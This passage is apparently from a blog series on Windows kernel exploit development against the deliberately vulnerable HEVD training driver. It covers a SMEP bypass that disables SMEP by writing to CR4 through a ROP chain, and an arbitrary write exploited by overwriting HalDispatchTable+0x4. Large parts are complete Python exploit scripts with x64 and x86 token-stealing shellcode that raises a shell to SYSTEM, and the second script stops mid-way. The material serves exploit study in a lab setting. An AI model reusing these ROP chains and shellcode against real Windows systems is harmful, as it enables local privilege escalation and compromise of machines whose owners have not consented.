SMEP is ENFORCED via the page table entry (PTE) of a memory page through the form of “flags”. Recall that a page table is what contains information about which part of physical memory maps to virtual memory. The PTE for a memory page has various flags that are associated with it. Two of those flags are U, for user mode or S, for supervisor mode (kernel mode). This flag is checked when said memory is accessed by the memory management unit (MMU). Before we move on, lets talk about CPU modes for a second. Ring 3 is responsible for user mode application code. Ring 0 is responsible for operating system level code (kernel mode). The CPU can transition its current privilege level (CPL) based on what is executing. I will not get into the lower level details of syscalls, sysrets, or other various routines that occur when the CPU changes the CPL. This is also not a blog on how paging works. If you are interested in learning more, I HIGHLY suggest the book What Makes It Page: The Windows 7 (x64) Virtual Memory Manager by Enrico Martignetti. Although this is specific to Windows 7, I believe these same concepts apply today. I give this background information, because SMEP bypassses could potentially abuse this functionality.

Think of the implementation of SMEP as the following:

Laws are created by the government. HOWEVER, the legislatures do not roam the streets enforcing the law. This is the job of our police force.

The same concept applies to SMEP. SMEP is enabled by the CR4 register- but the CR4 register does not enforce it. That is the job of the page table entries.

Why bring this up? Athough we will be outlining a SMEP bypass via ROP, let’s consider another scenario. Let’s say we have an arbitrary read and write primitive. Put aside the fact that PTEs are randomized for now. What if you had a read primitive to know where the PTE for the memory page of your shellcode was? Another potential (and interesting) way to bypass SMEP would be not to “disable SMEP” at all. Let’s think outside the box! Instead of “going to the mountain”- why not “bring the mountain to us”? We could potentially use our read primitive to locate our user mode shellcode page, and then use our write primitive to overwrite the PTE for our shellcode and flip the U (usermode) flag into an S (supervisor mode) flag! That way, when that particular address is executed although it is a “user mode address”, it is still executed because now the permissions of that page are that of a kernel mode page.

Although page table entries are randomized now, this presentation by Morten Schenk of Offensive Security talks about derandomizing page table entries.

Morten explains the steps as the following, if you are too lazy to read his work:

  1. Obtain read/write primitive
  2. Leak ntoskrnl.exe (kernel base)
  3. Locate MiGetPteAddress() (can be done dynamically instead of static offsets)
  4. Use PTE base to obtain PTE of any memory page
  5. Change bit (whether it is copying shellcode to page and flipping NX bit or flipping U/S bit of a user mode page)

Again, I will not be covering this method of bypassing SMEP until I have done more research on memory paging in Windows. See the end of this blog for my thoughts on other SMEP bypasses going forward.

SMEP Says Goodbye

Let’s use the an overflow to outline bypasssing SMEP with ROP. ROP assumes we have control over the stack (as each ROP gadget returns back to the stack). Since SMEP is enabled, our ROP gagdets will need to come from kernel mode pages. Since we are assuming medium integrity here, we can call EnumDeviceDrivers() to obtain the kernel base- which bypasses KASLR.

Essentially, here is how our ROP chain will work

-------------------
pop <reg> ; ret
-------------------
VALUE_WANTED_IN_CR4 (0x506f8) - This can be our own user supplied value.
-------------------
mov cr4, <reg> ; ret
-------------------
User mode payload address
-------------------

Let’s go hunting for these ROP gadgets. (NOTE - ALL OFFSETS TO ROP GADGETS WILL VARY DEPENDING ON OS, PATCH LEVEL, ETC.) Remember, these ROP gadgets need to be kernel mode addresses. We will use rp++ to enumerate rop gadgets in ntoskrnl.exe. If you take a look at my post about ROP, you will see how to use this tool.

Let’s figure out a way to control the contents of the CR4 register. Although we won’t probably won’t be able to directly manipulate the contents of the register directly, perhaps we can move the contents of a register that we can control into the CR4 register. Recall that a pop <reg> operation will take the contents of the next item on the stack, and store it in the register following the pop operation. Let’s keep this in mind.

Using rp++, we have found a nice ROP gadget in ntoskrnl.exe, that allows us to store the contents of CR4 in the ecx register (the “second” 32-bits of the RCX register.)

As you can see, this ROP gadget is “located” at 0x140108552. However, since this is a kernel mode address- rp++ (from usermode and not ran as an administrator) will not give us the full address of this. However, if you remove the first 3 bytes, the rest of the “address” is really an offset from the kernel base. This means this ROP gadget is located at ntoskrnl.exe + 0x108552.

Awesome! rp++ was a bit wrong in its enumeration. rp++ says that we can put ECX into the CR4 register. Howerver, upon further inspection, we can see this ROP gadget ACTUALLY points to a mov cr4, rcx instruction. This is perfect for our use case! We have a way to move the contents of the RCX register into the CR4 register. You may be asking “Okay, we can control the CR4 register via the RCX register- but how does this help us?” Recall one of the properties of ROP from my previous post. Whenever we had a nice ROP gadget that allowed a desired intruction, but there was an unecessary pop in the gadget, we used filler data of NOPs. This is because we are just simply placing data in a register- we are not executing it.

The same principle applies here. If we can pop our intended flag value into RCX, we should have no problem. As we saw before, our intended CR4 register value should be 0x506f8.

Real quick with brevity- let’s say rp++ was right in that we could only control the contents of the ECX register (instead of RCX). Would this affect us?

Recall, however, how the registers work here.

-----------------------------------
               RCX
-----------------------------------
                       ECX
-----------------------------------
                             CX
-----------------------------------
                           CH    CL
-----------------------------------

This means, even though RCX contains 0x00000000000506f8, a mov cr4, ecx would take the lower 32-bits of RCX (which is ECX) and place it into the CR4 register. This would mean ECX would equal 0x000506f8- and that value would end up in CR4. So even though we would theoretically using both RCX and ECX, due to lack of pop ecx ROP gadgets, we will be unaffected!

Now, let’s continue on to controlling the RCX register.

Let’s find a pop rcx gadget!

Nice! We have a ROP gadget located at ntoskrnl.exe + 0x3544. Let’s update our POC with some breakpoints where our user mode shellcode will reside, to verify we can hit our shellcode. This POC takes care of the semantics such as finding the offset to the ret instruction we are overwriting, etc.

import struct
import sys
import os
from ctypes import *

kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi


payload = bytearray(
    "\xCC" * 50
)

# Defeating DEP with VirtualAlloc. Creating RWX memory, and copying our shellcode in that region.
# We also need to bypass SMEP before calling this shellcode
print "[+] Allocating RWX region for shellcode"
ptr = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(payload)),              # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect
)

# Creates a ctype variant of the payload (from_buffer)
c_type_buffer = (c_char * len(payload)).from_buffer(payload)

print "[+] Copying shellcode to newly allocated RWX region"
kernel32.RtlMoveMemory(
    c_int(ptr),                       # Destination (pointer)
    c_type_buffer,                    # Source (pointer)
    c_int(len(payload))               # Length
)

# Need kernel leak to bypass KASLR
# Using Windows API to enumerate base addresses
# We need kernel mode ROP gadgets

# c_ulonglong because of x64 size (unsigned __int64)
base = (c_ulonglong * 1024)()

print "[+] Calling EnumDeviceDrivers()..."

get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    sizeof(base),                     # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails
if not base:
    print "[+] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

# The first entry in the array with device drivers is ntoskrnl base address
kernel_address = base[0]

print "[+] Found kernel leak!"
print "[+] ntoskrnl.exe base address: {0}".format(hex(kernel_address))

# Offset to ret overwrite
input_buffer = "\x41" * 2056

# SMEP says goodbye
print "[+] Starting ROP chain. Goodbye SMEP..."
input_buffer += struct.pack('<Q', kernel_address + 0x3544)      # pop rcx; ret

print "[+] Flipped SMEP bit to 0 in RCX..."
input_buffer += struct.pack('<Q', 0x506f8)           		# Intended CR4 value

print "[+] Placed disabled SMEP value in CR4..."
input_buffer += struct.pack('<Q', kernel_address + 0x108552)    # mov cr4, rcx ; ret

print "[+] SMEP disabled!"
input_buffer += struct.pack('<Q', ptr)                          # Location of user mode shellcode

input_buffer_length = len(input_buffer)

# 0x222003 = IOCTL code that will jump to TriggerStackOverflow() function
# Getting handle to driver to return to DeviceIoControl() function
print "[+] Using CreateFileA() to obtain and return handle referencing the driver..."
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
print "[+] Interacting with the driver..."
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x222003,                           # dwIoControlCode
    input_buffer,                       # lpInBuffer
    input_buffer_length,                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

Let’s take a look in WinDbg.

As you can see, we have hit the ret we are going to overwrite.

Before we step through, let’s view the call stack- to see how execution will proceed.

k

Open the image above in a new tab if you are having trouble viewing.

To help better understand the output of the call stack, the column Call Site is going to be the memory address that is executed. The RetAddr column is where the Call Site address will return to when it is done completing.

As you can see, the compromised ret is located at HEVD!TriggerStackOverflow+0xc8. From there we will return to 0xfffff80302c82544, or AuthzBasepRemoveSecurityAttributeValueFromLists+0x70. The next value in the RetAddr column, is the intended value for our CR4 register, 0x00000000000506f8.

Recall that a ret instruction will load RSP into RIP. Therefore, since our intended CR4 value is located on the stack, technically our first ROP gadget would “return” to 0x00000000000506f8. However, the pop rcx will take that value off of the stack and place it into RCX. Meaning we do not have to worry about returning to that value, which is not a valid memory address.

Upon the ret from the pop rcx ROP gadget, we will jump into the next ROP gadget, mov cr4, rcx, which will load RCX into CR4. That ROP gadget is located at 0xfffff80302d87552, or KiFlushCurrentTbWorker+0x12. To finish things out, we have the location of our user mode code, at 0x0000000000b70000.

After stepping through the vulnerable ret instruction, we see we have hit our first ROP gadget.

Now that we are here, stepping through should pop our intended CR4 value into RCX

Perfect. Stepping through, we should land on our next ROP gadget- which will move RCX (desired value to disable SMEP) into CR4.

Perfect! Let’s disable SMEP!

Nice! As you can see, after our ROP gadgets are executed - we hit our breakpoints (placeholder for our shellcode to verify SMEP is disabled)!

This means we have succesfully disabled SMEP, and we can execute usermode shellcode! Let’s finalize this exploit with a working POC. We will merge our payload concepts with the exploit now! Let’s update our script with weaponized shellcode!

import struct
import sys
import os
from ctypes import *

kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi


payload = bytearray(
    "\x65\x48\x8B\x04\x25\x88\x01\x00\x00"              # mov rax,[gs:0x188]  ; Current thread (KTHREAD)
    "\x48\x8B\x80\xB8\x00\x00\x00"                      # mov rax,[rax+0xb8]  ; Current process (EPROCESS)
    "\x48\x89\xC3"                                      # mov rbx,rax         ; Copy current process to rbx
    "\x48\x8B\x9B\xE8\x02\x00\x00"                      # mov rbx,[rbx+0x2e8] ; ActiveProcessLinks
    "\x48\x81\xEB\xE8\x02\x00\x00"                      # sub rbx,0x2e8       ; Go back to current process
    "\x48\x8B\x8B\xE0\x02\x00\x00"                      # mov rcx,[rbx+0x2e0] ; UniqueProcessId (PID)
    "\x48\x83\xF9\x04"                                  # cmp rcx,byte +0x4   ; Compare PID to SYSTEM PID
    "\x75\xE5"                                          # jnz 0x13            ; Loop until SYSTEM PID is found
    "\x48\x8B\x8B\x58\x03\x00\x00"                      # mov rcx,[rbx+0x358] ; SYSTEM token is @ offset _EPROCESS + 0x348
    "\x80\xE1\xF0"                                      # and cl, 0xf0        ; Clear out _EX_FAST_REF RefCnt
    "\x48\x89\x88\x58\x03\x00\x00"                      # mov [rax+0x358],rcx ; Copy SYSTEM token to current process
    "\x48\x83\xC4\x40"                                  # add rsp, 0x40       ; RESTORE (Specific to HEVD)
    "\xC3"                                              # ret                 ; Done!
)

# Defeating DEP with VirtualAlloc. Creating RWX memory, and copying our shellcode in that region.
# We also need to bypass SMEP before calling this shellcode
print "[+] Allocating RWX region for shellcode"
ptr = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(payload)),              # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect
)

# Creates a ctype variant of the payload (from_buffer)
c_type_buffer = (c_char * len(payload)).from_buffer(payload)

print "[+] Copying shellcode to newly allocated RWX region"
kernel32.RtlMoveMemory(
    c_int(ptr),                       # Destination (pointer)
    c_type_buffer,                    # Source (pointer)
    c_int(len(payload))               # Length
)

# Need kernel leak to bypass KASLR
# Using Windows API to enumerate base addresses
# We need kernel mode ROP gadgets

# c_ulonglong because of x64 size (unsigned __int64)
base = (c_ulonglong * 1024)()

print "[+] Calling EnumDeviceDrivers()..."

get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    sizeof(base),                     # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails
if not base:
    print "[+] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

# The first entry in the array with device drivers is ntoskrnl base address
kernel_address = base[0]

print "[+] Found kernel leak!"
print "[+] ntoskrnl.exe base address: {0}".format(hex(kernel_address))

# Offset to ret overwrite
input_buffer = ("\x41" * 2056)

# SMEP says goodbye
print "[+] Starting ROP chain. Goodbye SMEP..."
input_buffer += struct.pack('<Q', kernel_address + 0x3544)      # pop rcx; ret

print "[+] Flipped SMEP bit to 0 in RCX..."
input_buffer += struct.pack('<Q', 0x506f8)           		        # Intended CR4 value

print "[+] Placed disabled SMEP value in CR4..."
input_buffer += struct.pack('<Q', kernel_address + 0x108552)    # mov cr4, rcx ; ret

print "[+] SMEP disabled!"
input_buffer += struct.pack('<Q', ptr)                          # Location of user mode shellcode

input_buffer_length = len(input_buffer)

# 0x222003 = IOCTL code that will jump to TriggerStackOverflow() function
# Getting handle to driver to return to DeviceIoControl() function
print "[+] Using CreateFileA() to obtain and return handle referencing the driver..."
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
print "[+] Interacting with the driver..."
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x222003,                           # dwIoControlCode
    input_buffer,                       # lpInBuffer
    input_buffer_length,                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

os.system("cmd.exe /k cd C:\\")

This shellcode adds 0x40 to RSP as you can see from above. This is specific to the process I was exploiting, to resume execution. Also in this case, RAX was already set to 0. Therefore, there was no need to xor rax, rax.

As you can see, SMEP has been bypassed!

SMEP Bypass via PTE Overwrite

Perhaps in another blog I will come back to this. I am going to go back and do some more research on the memory manger unit and memory paging in Windows. When that research has concluded, I will get into the low level details of overwriting page table entries to turn user mode pages into kernel mode pages. In addition, I will go and do more research on pool memory in kernel mode and look into how pool overflows and use-after-free kernel exploits function and behave.

Thank you for joining me along this journey! And thank you to Morten Schenk, Alex Ionescu, and Intel. You all have aided me greatly.

Please feel free to contact me with any suggestions, comments, or corrections! I am open to it all.

Peace, love, and positivity :-)

Exploit Development: Windows Kernel Exploitation - Arbitrary Overwrites (Write-What-Where)

13 November 2019 at 00:00

Introduction

In a previous post, I talked about setting up a Windows kernel debugging environment. Today, I will be building on that foundation produced within that post. Again, we will be taking a look at the HackSysExtreme vulnerable driver. The HackSysExtreme team implemented a plethora of vulnerabilities here, based on the IOCTL code sent to the driver. The vulnerability we are going to take look at today is what is known as an arbitrary overwrite.

At a very high level what this means, is an adversary has the ability to write a piece of data (generally going to be a shellcode) to a particular, controlled location. As you may recall from my previous post, the reason why we are able to obtain local administrative privileges (NT AUTHORITY\SYSTEM) is because we have the ability to do the following:

  1. Allocate a piece of memory in user land that contains our shellcode
  2. Execute said shellcode from the context of ring 0 in kernel land

Since the shellcode is being executed in the context of ring 0, which runs as local administrator, the shellcode will be ran with administrative privileges. Since our shellcode will copy the NT AUTHORITY\SYSTEM token to a cmd.exe process- our shell will be an administrative shell.

Code Analysis

First let’s look at the ArbitraryWrite.h header file.

Take a look at the following snippet:

typedef struct _WRITE_WHAT_WHERE
{
    PULONG_PTR What;
    PULONG_PTR Where;
} WRITE_WHAT_WHERE, *PWRITE_WHAT_WHERE;

typedef in C, allows us to create our own data type. Just as char and int are data types, here we have defined our own data type.

Then, the WRITE_WHAT_WHERE line, is an alias that can be now used to reference the struct _WRITE_WHAT_WHERE. Then lastly, an aliased pointer is created called PWRITE_WHAT_WHERE.

Most importantly, we have a pointer called What and a pointer called Where. Essentially now, WRITE_WHAT_WHERE refers to this struct containing What and Where. PWRITE_WHAT_WHERE, when referenced, is a pointer to this struct.

Moving on down the header file, this is presented to us:

NTSTATUS
TriggerArbitraryWrite(
    _In_ PWRITE_WHAT_WHERE UserWriteWhatWhere
);

Now, the variable UserWriteWhatWhere has been attributed to the datatype PWRITE_WHAT_WHERE. As you can recall from above, PWRITE_WHAT_WHERE is a pointer to the struct that contains What and Where pointers (Which will be exploited later on). From now on UserWriteWhatWhere also points to the struct.

Let’s move on to the source file, ArbitraryWrite.c.

The above function, TriggerArbitraryWrite() is passed to the source file.

Then, the What and Where pointers declared earlier in the struct, are initialized as NULL pointers:

PULONG_PTR What = NULL;
PULONG_PTR Where = NULL;

Then finally, we reach our vulnerability:

#else
        DbgPrint("[+] Triggering Arbitrary Write\n");

        //
        // Vulnerability Note: This is a vanilla Arbitrary Memory Overwrite vulnerability
        // because the developer is writing the value pointed by 'What' to memory location
        // pointed by 'Where' without properly validating if the values pointed by 'Where'
        // and 'What' resides in User mode
        //

        *(Where) = *(What);

As you can see, an adversary could write the value pointed by What to the memory location referenced by Where. The real issue is that there is no validation, using a Windows API function such as ProbeForRead() and ProbeForWrite, that confirms whether or not the values of What and Where reside in user mode. Knowing this, we will be able to utilize our user mode shellcode going forward for the exploit.

IOCTL

As you can recall in the last blog, the IOCTL code that was used to interact with the HEVD vulnerable driver and take advantage of the TriggerStackOverflow() function, occurred at this routine:

After tracing the IOCTL routine that jumps into the TriggerArbitraryOverwrite() function, here is what is displayed:

The above routine is part of a chain as displayed as below:

Now time to calculate the IOCTL code- which allows us to interact with the vulnerable routine. Essentially, look at the very first routine from above, that was utilized for my last blog post. The IOCTL code was 0x222003. (Notice how the value is only 6 digits, even though x86 requires 8 digits in a memory address. 0x222003 = 0x00222003) The instruction of sub eax, 0x222003 will yield a value of zero, and the jz short loc_155FB (jump if zero) will jump into the TriggerStackOverflow() function. So essentially using deductive reasoning, EAX contains a value of 0x222003 at the time the jump is taken.

Looking at the second and third routines in the image above:

sub eax, 4
jz short loc_155E3

and

sub eax, 4
jz short loc_155CB

Our goal is to successfully complete the “jump if zero” jump into the applicable vulnerability. In this case, the third routine shown above, will lead us directly into the TriggerArbitraryOverwrite(), if the corresponding “jump if zero” jump is completed.

If EAX is currently at 0x222003, and EAX is subtracted a total of 8 times, let’s try adding 8 to the current IOCTL code from the last exploit- 0x222003. Adding 8 will give us a value of 0x22200B, or 0x0022200B as a legitimate x86 value. That means by the time the value of EAX reaches the last routine, it will equal 0x222003 and make the applicable jump into the TriggerArbitraryOverwrite() function!

Proof Of Concept

Utilizing the newly calculated IOCTL, let’s create a POC:

import struct
import sys
import os
from ctypes import *
from subprocess import *

# DLLs for Windows API interaction
kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi

# Getting handle to driver to return to DeviceIoControl() function
print "[+] Using CreateFileA() to obtain and return handle referencing the driver..."
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

poc = "\x41\x41\x41\x41"                # What
poc += "\x42\x42\x42\x42"               # Where
poc_length = len(poc)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    poc,                                # lpInBuffer
    poc_length,                         # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

After setting up the debugging environment, run the POC. As you can see- What and Where have been cleanly overwritten!:

HALp! How Do I Hax?

At the current moment, we have the ability to write a given value at a certain location. How does this help? Let’s talk a bit more on the ability to execute user mode shellcode from kernel mode.

In the stack overflow vulnerability, our user mode memory was directly copied to kernel mode- without any check. In this case, however, things are not that straight forward. Here, there is no memory copy DIRECTLY to kernel mode.

However, there is one way we can execute user mode shellcode from kernel mode. Said way is via the HalDispatchTable (Hardware Abstraction Layer Dispatch Table).

Let’s talk about why we are doing what we are doing, and why the HalDispatchTable is important.

The hardware abstraction layer, in Windows, is a part of the kernel that provides routines dealing with hardware/machine instructions. Basically it allows multiple hardware architectures to be compatible with Windows, without the need for a different version of the operating system.

Having said that, there is an undocumented Windows API function known as NtQueryIntervalProfile().

What does NtQueryIntervalProfile() have to do with the kernel? How does the HalDispatchTable even help us? Let’s talk about this.

If you disassemble the NtQueryIntervalProfile() in WinDbg, you will see that a function called KeQueryIntervalProfile() is called in this function:

uf nt!NtQueryIntervalProfile:

If we disassemble the KeQueryIntervalProfile(), you can see the HalDispatchTable actually gets called by this function, via a pointer!

uf nt!KeQueryIntervalProfile:

Essentially, the address at HalDispatchTable + 0x4, is passed via KeQueryIntervalProfile(). If we can overwrite that pointer with a pointer to our user mode shellcode, natural execution will eventually execute our shellcode, when NtQueryIntervalProfile() (which calls KeQueryIntervalProfile()) is called!

Order Of Operations

Here are the steps we need to take, in order for this to work:

  1. Enumerate all drivers addresses via EnumDeviceDrivers()
  2. Sort through the list of addresses for the address of ntkornl.exe (ntoskrnl.exe exports KeQueryIntervalProfile())
  3. Load ntoskrnl.exe handle into LoadLibraryExA and then enumerate the HalDispatchTable address via GetProcAddress
  4. Once the HalDispatchTable address is found, we will calculate the address of HalDispatchTable + 0x4 (by adding 4 bytes), and overwrite that pointer with a pointer to our user mode shellcode

EnumDeviceDrivers()

# Enumerating addresses for all drivers via EnumDeviceDrivers()
base = (c_ulong * 1024)()
get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    c_int(1024),                      # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails
if not base:
    print "[+] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

This snippet of code enumerates the base addresses for the drivers, and exports them to an array. After the base addresses have been enumerated, we can move on to finding the address of ntoskrnl.exe

ntoskrnl.exe

# Cycle through enumerated addresses, for ntoskrnl.exe using GetDeviceDriverBaseNameA()
for base_address in base:
    if not base_address:
        continue
    current_name = c_char_p('\x00' * 1024)
    driver_name = psapi.GetDeviceDriverBaseNameA(
        base_address,                 # ImageBase (load address of current device driver)
        current_name,                 # lpFilename
        48                            # nSize (size of the buffer, in chars)
    )

    # Error handling if function fails
    if not driver_name:
        print "[+] GetDeviceDriverBaseNameA() function call failed!"
        sys.exit(-1)

    if current_name.value.lower() == 'ntkrnl' or 'ntkrnl' in current_name.value.lower():

        # When ntoskrnl.exe is found, return the value at the time of being found
        current_name = current_name.value

        # Print update to show address of ntoskrnl.exe
        print "[+] Found address of ntoskrnl.exe at: {0}".format(hex(base_address))

        # It assumed the information needed from the for loop has been found if the program has reached execution at this point.
        # Stopping the for loop to move on.
        break

This is a snippet of code that essentially will loop through the array where all of the base addresses have been exported to, and search for ntoskrnl.exe via GetDeviceDriverBaseNameA(). Once that has been found, the address will be stored.

LoadLibraryExA()

# Beginning enumeration
kernel_handle = kernel32.LoadLibraryExA(
    current_name,                       # lpLibFileName (specifies the name of the module, in this case ntlkrnl.exe)
    None,                               # hFile (parameter must be null)
    0x00000001                          # dwFlags (DONT_RESOLVE_DLL_REFERENCES)
)

# Error handling if function fails
if not kernel_handle:
    print "[+] LoadLibraryExA() function failed!"
    sys.exit(-1)

In this snippet, LoadLibraryExA() receives the handle from GetDeviceDriverBaseNameA() (which is ntoskrnl.exe in this case). It then proceeds, in the snippet below, to pass the handle loaded into memory (which is still ntoskrnl.exe) to the function GetProcAddress().

GetProcAddress()

hal = kernel32.GetProcAddress(
    kernel_handle,                      # hModule (handle passed via LoadLibraryExA to ntoskrnl.exe)
    'HalDispatchTable'                  # lpProcName (name of value)
)

# Subtracting ntoskrnl base in user mode
hal -= kernel_handle

# Add base address of ntoskrnl in kernel mode
hal += base_address

# Recall earlier we were more interested in HAL + 0x4. Let's grab that address.
real_hal = hal + 0x4

# Print update with HAL and HAL + 0x4 location
print "[+] HAL location: {0}".format(hex(hal))
print "[+] HAL + 0x4 location: {0}".format(hex(real_hal))

GetProcAddress() will reveal to us the address of the HalDispatchTable and HalDispatchTable + 0x4. We are more interested in HalDispatchTable + 0x4.

Once we have the address for HalDispatchTable + 0x4, we can weaponize our exploit:

# HackSysExtreme Vulnerable Driver Kernel Exploit (Arbitrary Overwrite)
# Author: Connor McGarr

import struct
import sys
import os
from ctypes import *
from subprocess import *

# DLLs for Windows API interaction
kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi

class WriteWhatWhere(Structure):
    _fields_ = [
        ("What", c_void_p),
        ("Where", c_void_p)
    ]

payload = bytearray(
    "\x90\x90\x90\x90"                # NOP sled
    "\x60"                            # pushad
    "\x31\xc0"                        # xor eax,eax
    "\x64\x8b\x80\x24\x01\x00\x00"    # mov eax,[fs:eax+0x124]
    "\x8b\x40\x50"                    # mov eax,[eax+0x50]
    "\x89\xc1"                        # mov ecx,eax
    "\xba\x04\x00\x00\x00"            # mov edx,0x4
    "\x8b\x80\xb8\x00\x00\x00"        # mov eax,[eax+0xb8]
    "\x2d\xb8\x00\x00\x00"            # sub eax,0xb8
    "\x39\x90\xb4\x00\x00\x00"        # cmp [eax+0xb4],edx
    "\x75\xed"                        # jnz 0x1a
    "\x8b\x90\xf8\x00\x00\x00"        # mov edx,[eax+0xf8]
    "\x89\x91\xf8\x00\x00\x00"        # mov [ecx+0xf8],edx
    "\x61"                            # popad
    "\x31\xc0"                        # xor eax, eax (restore execution)
    "\x83\xc4\x24"                    # add esp, 0x24 (restore execution)
    "\x5d"                            # pop ebp
    "\xc2\x08\x00"                    # ret 0x8
)

# Defeating DEP with VirtualAlloc. Creating RWX memory, and copying our shellcode in that region.
print "[+] Allocating RWX region for shellcode"
ptr = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(payload)),              # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect
)

# Creates a ctype variant of the payload (from_buffer)
c_type_buffer = (c_char * len(payload)).from_buffer(payload)

print "[+] Copying shellcode to newly allocated RWX region"
kernel32.RtlMoveMemory(
    c_int(ptr),                       # Destination (pointer)
    c_type_buffer,                    # Source (pointer)
    c_int(len(payload))               # Length
)

# Python, when using id to return a value, creates an offset of 20 bytes ot the value (first bytes reference variable)
# After id returns the value, it is then necessary to increase the returned value 20 bytes
payload_address = id(payload) + 20
payload_updated = struct.pack("<L", ptr)
payload_final = id(payload_updated) + 20

# Location of shellcode update statement
print "[+] Location of shellcode: {0}".format(hex(payload_address))

# Location of pointer to shellcode
print "[+] Location of pointer to shellcode: {0}".format(hex(payload_final))

# The goal is to eventually locate HAL table.
# HAL is exported by ntoskrnl.exe
# ntoskrnl.exe's location can be enumerated via EnumDeviceDrivers() and GetDEviceDriverBaseNameA() functions via Windows API.

# Enumerating addresses for all drivers via EnumDeviceDrivers()
base = (c_ulong * 1024)()
get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    c_int(1024),                      # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails
if not base:
    print "[+] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

# Cycle through enumerated addresses, for ntoskrnl.exe using GetDeviceDriverBaseNameA()
for base_address in base:
    if not base_address:
        continue
    current_name = c_char_p('\x00' * 1024)
    driver_name = psapi.GetDeviceDriverBaseNameA(
        base_address,                 # ImageBase (load address of current device driver)
        current_name,                 # lpFilename
        48                            # nSize (size of the buffer, in chars)
    )

    # Error handling if function fails
    if not driver_name:
        print "[+] GetDeviceDriverBaseNameA() function call failed!"
        sys.exit(-1)

    if current_name.value.lower() == 'ntkrnl' or 'ntkrnl' in current_name.value.lower():

        # When ntoskrnl.exe is found, return the value at the time of being found
        current_name = current_name.value

        # Print update to show address of ntoskrnl.exe
        print "[+] Found address of ntoskrnl.exe at: {0}".format(hex(base_address))

        # It assumed the information needed from the for loop has been found if the program has reached execution at this point.
        # Stopping the for loop to move on.
        break
    
# Now that all of the proper information to reference HAL has been enumerated, it is time to get the location of HAL and HAL 0x4
# NtQueryIntervalProfile is an undocumented Windows API function that references HAL at the location of HAL +0x4.
# HAL +0x4 is the address we will eventually need to write over. Once HAL is exported, we will be most interested in HAL + 0x4

# Beginning enumeration
kernel_handle = kernel32.LoadLibraryExA(
    current_name,                       # lpLibFileName (specifies the name of the module, in this case ntlkrnl.exe)
    None,                               # hFile (parameter must be null
    0x00000001                          # dwFlags (DONT_RESOLVE_DLL_REFERENCES)
)

# Error handling if function fails
if not kernel_handle:
    print "[+] LoadLibraryExA() function failed!"
    sys.exit(-1)

# Getting HAL Address
hal = kernel32.GetProcAddress(
    kernel_handle,                      # hModule (handle passed via LoadLibraryExA to ntoskrnl.exe)
    'HalDispatchTable'                  # lpProcName (name of value)
)

# Subtracting ntoskrnl base in user mode
hal -= kernel_handle

# Add base address of ntoskrnl in kernel mode
hal += base_address

# Recall earlier we were more interested in HAL + 0x4. Let's grab that address.
real_hal = hal + 0x4

# Print update with HAL and HAL + 0x4 location
print "[+] HAL location: {0}".format(hex(hal))
print "[+] HAL + 0x4 location: {0}".format(hex(real_hal))

# Referencing class created at the beginning of the sploit and passing shellcode to vulnerable pointers
# This is where the exploit occurs
write_what_where = WriteWhatWhere()
write_what_where.What = payload_final   # What we are writing (our shellcode)
write_what_where.Where = real_hal       # Where we are writing it to (HAL + 0x4). NtQueryIntervalProfile() will eventually call this location and execute it
